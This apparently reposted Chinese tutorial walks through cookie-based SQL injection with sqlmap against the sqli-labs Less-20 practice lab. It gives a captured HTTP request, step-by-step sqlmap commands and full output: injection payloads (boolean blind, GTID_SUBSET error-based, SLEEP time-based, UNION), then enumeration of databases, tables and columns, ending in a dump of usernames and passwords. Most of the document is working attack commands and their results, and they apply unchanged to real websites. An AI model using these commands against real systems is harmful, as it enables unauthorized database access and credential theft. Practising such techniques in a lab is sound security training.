sqlmap如何进行Cookie注入

Delina

原文链接：sqlmap如何进行Cookie注入
​
一、检测Cookie注入
1、通过BurpSuite抓包，将封包内容保存到1.txt

1. GET /sqli/Less-20/index.php HTTP/1.1
   
2. Host: 192.168.139.129
   
3. Cache-Control: max-age=0
   
4. Upgrade-Insecure-Requests: 1
   
5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
   
6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
   
7. Referer: http://192.168.139.129/sqli/Less-20/index.php
   
8. Accept-Encoding: gzip, deflate
   
9. Accept-Language: zh-CN,zh;q=0.9
   
10. Cookie: uname=admin; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
    
11. Connection: close

复制代码

2、判断是否存在注入

1. sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2
   
2. --cookie：指定参数
   
3. --level 2：等级2以上才会检测cookie注入

复制代码

​

1. 运行结果：
   
2. [16:44:49] [INFO] Cookie parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable                                                                             
   
3. Cookie parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
   
4. sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
   
5. ---
   
6. Parameter: uname (Cookie)
   
7.     Type: boolean-based blind
   
8.     Title: AND boolean-based blind - WHERE or HAVING clause
   
9.     Payload: uname=admin' AND 6679=6679 AND 'sdQh'='sdQh; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
   
10.     Type: error-based
    
11.     Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    
12.     Payload: uname=admin' AND GTID_SUBSET(CONCAT(0x7162717171,(SELECT (ELT(6429=6429,1))),0x717a767a71),6429) AND 'whpT'='whpT; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
    
13.     Type: time-based blind
    
14.     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    
15.     Payload: uname=admin' AND (SELECT 6802 FROM (SELECT(SLEEP(5)))pIcR) AND 'rFnD'='rFnD; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
    
16.     Type: UNION query
    
17.     Title: Generic UNION query (NULL) - 3 columns
    
18.     Payload: uname=-4950' UNION ALL SELECT NULL,CONCAT(0x7162717171,0x4f62636a6e49426b5a415141657259517971566f6463496b714561576f4d58446459787146754d78,0x717a767a71),NULL-- -; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
    
19. ---
    
20. [16:44:55] [INFO] the back-end DBMS is MySQL
    
21. web application technology: PHP 5.4.45, Nginx 1.15.11
    
22. back-end DBMS: MySQL >= 5.6
    
23. [16:44:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'   

复制代码

二、获取数据库

• 
  

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 --dbs
​

• 
  

1. 运行结果：
   
2. [16:57:57] [INFO] the back-end DBMS is MySQL
   
3. web application technology: Nginx 1.15.11, PHP 5.4.45
   
4. back-end DBMS: MySQL >= 5.6
   
5. [16:57:57] [INFO] fetching database names
   
6. do you want to URL encode cookie values (implementation specific)? [Y/n]
   
7. [16:57:59] [WARNING] reflective value(s) found and filtering out
   
8. available databases [10]:
   
9. [*] challenges
   
10. [*] dvwa
    
11. [*] information_schema
    
12. [*] mysql
    
13. [*] performance_schema
    
14. [*] pikachu
    
15. [*] security
    
16. [*] sys
    
17. [*] www_dgdg_com
    
18. [*] www_zm_com
    
19. [16:57:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

复制代码

• 
  

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security --tables
​

1. 运行结果：
   
2. [17:05:15] [INFO] the back-end DBMS is MySQL
   
3. web application technology: PHP 5.4.45, Nginx 1.15.11
   
4. back-end DBMS: MySQL >= 5.6
   
5. [17:05:15] [INFO] fetching tables for database: 'security'
   
6. do you want to URL encode cookie values (implementation specific)? [Y/n]
   
7. [17:05:16] [WARNING] reflective value(s) found and filtering out
   
8. Database: security
   
9. [4 tables]
   
10. +----------+
    
11. | emails   |
    
12. | referers |
    
13. | uagents  |
    
14. | users    |
    
15. +----------+
    
16. [17:05:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

复制代码

四、获取字段名

• 
  

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --columns
​

1. 运行结果：
   
2. [17:07:37] [INFO] the back-end DBMS is MySQL
   
3. web application technology: PHP 5.4.45, Nginx 1.15.11
   
4. back-end DBMS: MySQL >= 5.6
   
5. [17:07:37] [INFO] fetching columns for table 'users' in database 'security'
   
6. do you want to URL encode cookie values (implementation specific)? [Y/n]
   
7. [17:07:38] [WARNING] reflective value(s) found and filtering out
   
8. Database: security
   
9. Table: users
   
10. [3 columns]
    
11. +----------+-------------+
    
12. | Column   | Type        |
    
13. +----------+-------------+
    
14. | id       | int(3)      |
    
15. | password | varchar(20) |
    
16. | username | varchar(20) |
    
17. +----------+-------------+
    
18. [17:07:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'  

复制代码

五、获取字段内容

• 
  

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"
​

1. 运行结果：
   
2. [17:09:08] [INFO] the back-end DBMS is MySQL
   
3. web application technology: PHP 5.4.45, Nginx 1.15.11
   
4. back-end DBMS: MySQL >= 5.6
   
5. [17:09:08] [INFO] fetching columns for table 'users' in database 'security'
   
6. [17:09:08] [INFO] fetching entries for table 'users' in database 'security'
   
7. do you want to URL encode cookie values (implementation specific)? [Y/n]
   
8. [17:09:09] [WARNING] reflective value(s) found and filtering out
   
9. Database: security
   
10. Table: users
    
11. [13 entries]
    
12. +----+------------+----------+
    
13. | id | password   | username |
    
14. +----+------------+----------+
    
15. | 1  | Dumb       | Dumb     |
    
16. | 2  | I-kill-you | Angelina |
    
17. | 3  | p@ssword   | Dummy    |
    
18. | 4  | crappy     | secure   |
    
19. | 5  | stupidity  | stupid   |
    
20. | 6  | genious    | superman |
    
21. | 7  | mob!le     | batman   |
    
22. | 8  | admin      | admin    |
    
23. | 9  | admin1     | admin1   |
    
24. | 10 | admin2     | admin2   |
    
25. | 11 | admin3     | admin3   |
    
26. | 12 | dumbo      | dhakkan  |
    
27. | 14 | admin4     | admin4   |
    
28. +----+------------+----------+
    
29. [17:09:09] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/security/users.csv'                                             
    
30. [17:09:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

复制代码

六、其他检测Cookie注入方法1、检测是否存在注入

• 
  

sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2
2、获取数据库名称

• 
  

sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 --dbs
3、获取表名

• 
  

sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security --tables
4、获取字段名

• 
  

sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --columns
5、获取字段内容

• 
  

sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"
​